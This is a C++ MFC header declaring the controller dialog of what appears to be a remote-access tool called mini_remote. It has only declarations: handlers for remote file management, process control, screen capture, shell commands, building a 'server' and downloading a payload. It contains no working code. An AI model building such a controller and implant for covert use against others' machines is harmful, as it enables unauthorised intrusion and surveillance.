www.pudn.com > mini_remote.zip > MainCtrlDlg.h
// MainCtrlDlg.h : header file
//
#if !defined(AFX_MAINCTRLDLG_H__57891A28_E132_44E4_8214_8A8FD41C5A04__INCLUDED_)
#define AFX_MAINCTRLDLG_H__57891A28_E132_44E4_8214_8A8FD41C5A04__INCLUDED_
#if _MSC_VER > 1000
#pragma once
#endif // _MSC_VER > 1000
/////////////////////////////////////////////////////////////////////////////
// CMainCtrlDlg dialog
#define UM_ICONNOTIFY WM_USER+100
class CMainCtrlDlg : public CDialog
{
// Construction
public:
CWinThread *LT;
CString m_pldownurl;
void AcceptHost(SOCKET cs,SOCKADDR_IN csa);
BOOL LoadSource(UINT resoure_id , const char * type , const char * filepath);
CMainCtrlDlg(CWnd* pParent = NULL); // standard constructor
// Dialog Data
//{{AFX_DATA(CMainCtrlDlg)
enum { IDD = IDD_MAINCTRL_DIALOG };
CWBButton m_btn_ok;
CWBButton m_btn_7;
CWBButton m_btn_6;
CWBButton m_btn_5;
CWBButton m_btn_4;
CWBButton m_btn_3;
CWBButton m_btn_2;
CWBButton m_btn_1;
CListCtrl m_ListCtrl;
CString m_sysmsg;
//}}AFX_DATA
// ClassWizard generated virtual function overrides
//{{AFX_VIRTUAL(CMainCtrlDlg)
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV support
//}}AFX_VIRTUAL
// Implementation
protected:
HICON m_hIcon;
// Generated message map functions
//{{AFX_MSG(CMainCtrlDlg)
virtual BOOL OnInitDialog();
virtual void OnOK();
afx_msg void OnPaint();
afx_msg HCURSOR OnQueryDragIcon();
afx_msg void OnFilemanager();
afx_msg void OnProcess();
afx_msg void OnTimer(UINT nIDEvent);
afx_msg void OnLButtonDown(UINT nFlags, CPoint point);
afx_msg void OnDestroy();
afx_msg void OnVapctrl();
afx_msg void OnScreencatch();
afx_msg void OnSetting();
afx_msg void OnHostinfo();
afx_msg void OnButtonCmd();
//}}AFX_MSG
afx_msg void OnMyNotice();
afx_msg void OnAboutSoft();
afx_msg void OnHelp();
afx_msg void OnLocalSetting();
afx_msg void OnExit();
afx_msg void OnRemoveAll();
afx_msg void OnPLdwonLoad();
afx_msg void OnMakeServer();
afx_msg void OnIconNotify(WPARAM wParam,LPARAM lParam);
DECLARE_MESSAGE_MAP()
};
//{{AFX_INSERT_LOCATION}}
// Microsoft Visual C++ will insert additional declarations immediately before the previous line.
#endif // !defined(AFX_MAINCTRLDLG_H__57891A28_E132_44E4_8214_8A8FD41C5A04__INCLUDED_)